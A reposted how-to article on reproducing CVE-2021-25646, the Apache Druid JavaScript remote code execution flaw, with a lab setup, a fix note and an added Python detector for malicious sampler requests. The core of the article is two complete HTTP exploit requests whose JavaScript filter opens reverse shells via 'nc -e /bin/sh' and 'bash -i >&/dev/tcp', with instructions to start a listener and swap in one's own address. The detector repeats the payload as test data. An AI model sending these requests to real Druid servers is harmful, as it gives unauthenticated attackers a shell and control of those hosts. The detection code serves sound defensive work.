2025-03-31 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
How do you reproduce the Apache Druid remote code execution vulnerability CVE-2021-25646? This article walks through the analysis, a reproduction environment, two working requests, and the fix, so that readers facing the same question have a simple and workable procedure.
I. Vulnerability summary
Apache Druid is a column-oriented, open-source, distributed data store written in Java. It is designed to ingest large volumes of event data quickly and to serve low-latency queries on top of that data.
Druid can execute user-supplied JavaScript embedded in requests (filters, aggregators, extraction functions). That feature is meant for high-trust deployments and is disabled by default, but in Druid 0.20.0 and earlier a specially crafted request can force the server to run the embedded JavaScript for that request regardless of the druid.javascript.enabled setting. Because Druid also ships with no authentication or authorization enabled by default, an unauthenticated attacker who can reach the router or overlord port can send such a request and execute arbitrary commands with the privileges of the Druid server process.
II. Affected scope
Affected versions: Apache Druid < 0.20.1
Fixed version: Apache Druid 0.20.1

III. Environment setup
Project and documentation:
https://github.com/apache/druid/
https://druid.apache.org/docs/latest/tutorials/index.html

Download version 0.19:
https://github.com/apache/druid/releases/tag/druid-0.19.0

Unzip the archive, then start the bundled Docker Compose environment:
cd druid-druid-0.19.0-rc1\distribution\docker
docker-compose up -d

Open the console at http://192.168.123.10:8888

IV. Vulnerability reproduction
Both requests target the sampler endpoint, which parses the submitted ingestion spec and evaluates the transformSpec filter against the sample rows. The filter is of type "javascript", and the extra empty-name property "": {"enabled": true} is what makes the server run it even when JavaScript is disabled in its configuration. The Content-Length values below are those of the original capture; if you change the body, recompute them or let your HTTP client set the header.

PoC 1 (generic):

POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.123.10:8888
Accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Referer: http://192.168.123.10:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 1007

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.123.10 5555 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

Note: the Docker image has no bash, so this PoC uses nc -e for the reverse shell. Start a listener first (for example nc -lvp 5555 on 192.168.123.10).

PoC 2 (generic):

POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: 0.0.0.0:8888
Content-Length: 1005
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
DNT: 1
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/0.0.0.0/5555 0>&1')}","dimension":"added","":{"enabled":"true"}}}},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}

PoC 2 differs from PoC 1 in two ways: the sample data is fetched over HTTP from the public example manifest instead of being inlined, and the command uses the "bash -c $@|bash 0 echo ..." form so that the redirections survive Runtime.exec() splitting the string on whitespace. Replace 0.0.0.0:5555 with your listener's address and port; the target must have bash for this variant.
V. Remediation advice
Upgrade to Apache Druid 0.20.1 or later. Note that setting druid.javascript.enabled=false does not protect against this issue, since the crafted request overrides that setting; until the upgrade is done, enable Druid's authentication and authorization (an authenticator and authorizer chain) and restrict network access to the router (8888) and overlord ports so that the sampler endpoint is not reachable by untrusted clients.
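As an added example (not code from the original write-up or from the Druid project), the Python below shows the two checks a defender would want after reading the PoCs above: a version comparison against the 0.20.1 fix, and a scan of a captured sampler request body that flags any "javascript"-typed spec and marks as high severity the ones carrying the empty-name "": {"enabled": ...} override that makes the request work with JavaScript disabled. The request bodies it inspects are constructed inline from the shape of PoC 1 (shortened sample data); the function names and severity labels are this example's own, not Druid's.

```python
import json
import re

SAMPLER_PATH = "/druid/indexer/v1/sampler"
FIXED_VERSION = (0, 20, 1)   # CVE-2021-25646 is fixed in Apache Druid 0.20.1


def parse_version(version):
    """Turn a Druid version string such as '0.19.0' (the "version" field of
    GET /status) into a comparable tuple; a suffix like -SNAPSHOT is ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError("unrecognised Druid version: %r" % version)
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(version):
    """True when the reported version predates the 0.20.1 fix."""
    return parse_version(version) < FIXED_VERSION


def find_javascript_specs(node, path="$"):
    """Walk a parsed ingestion spec and collect every object whose "type" is
    "javascript" (filters, aggregators, extraction functions, ...) as
    (json_path, object) pairs."""
    hits = []
    if isinstance(node, dict):
        if node.get("type") == "javascript":
            hits.append((path, node))
        for key, value in node.items():
            hits.extend(find_javascript_specs(value, "%s.%s" % (path, key or '""')))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_javascript_specs(value, "%s[%d]" % (path, i)))
    return hits


def has_config_override(js_spec):
    """The CVE-2021-25646 tell-tale: an empty-name property on the JavaScript
    spec whose value sets "enabled", which lets the request supply its own
    JavaScript config and override druid.javascript.enabled on Druid < 0.20.1."""
    override = js_spec.get("")
    return isinstance(override, dict) and "enabled" in override


def assess_request(method, path, body):
    """Return findings for one HTTP request to the Druid router/overlord.
    body may be a JSON string/bytes or an already-parsed object."""
    findings = []
    if method.upper() != "POST" or path.split("?", 1)[0] != SAMPLER_PATH:
        return findings
    if isinstance(body, (str, bytes)):
        try:
            body = json.loads(body)
        except ValueError:
            return findings          # not JSON, so not this attack
    for json_path, spec in find_javascript_specs(body):
        findings.append({
            "path": json_path,
            "severity": "high" if has_config_override(spec) else "medium",
            "function": spec.get("function", ""),
        })
    return findings


def sampler_body(filter_spec):
    """Build a sampler request body shaped like PoC 1 with the given filter
    (constructed sample data for this example, not a live capture)."""
    return {
        "type": "index",
        "spec": {
            "ioConfig": {
                "type": "index",
                "inputSource": {"type": "inline",
                                "data": '{"timestamp":"2020-12-12T12:10:21.040Z","added":1}'},
                "inputFormat": {"type": "json", "keepNullColumns": True},
            },
            "dataSchema": {
                "dataSource": "sample",
                "timestampSpec": {"column": "timestamp", "format": "iso"},
                "dimensionsSpec": {},
                "transformSpec": {"transforms": [], "filter": filter_spec},
            },
            "tuningConfig": {"type": "index"},
        },
        "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
    }


# Constructed bodies: the PoC 1 JavaScript filter with the empty-name override,
# and an ordinary selector filter that a legitimate sampler call might carry.
POC1_BODY = sampler_body({
    "type": "javascript",
    "dimension": "added",
    "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.123.10 5555 -e /bin/sh')}",
    "": {"enabled": True},
})
BENIGN_BODY = sampler_body({"type": "selector", "dimension": "added", "value": "1"})


if __name__ == "__main__":
    print("0.19.0 vulnerable:", is_vulnerable_version("0.19.0"))
    for f in assess_request("POST", SAMPLER_PATH + "?for=example-manifest", POC1_BODY):
        print(f["severity"], f["path"], f["function"][:60])
```

To use it against real traffic, feed assess_request() the method, path and body of each request logged by a reverse proxy in front of the router; a "high" finding on a server whose /status version is below 0.20.1 is a confirmed exploitation attempt, and a "medium" finding is still worth review because JavaScript specs should never arrive from untrusted clients.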
That is how the Apache Druid remote code execution vulnerability CVE-2021-25646 is reproduced. We hope the above is of some help; if you still have questions, follow the industry information channel for more related material.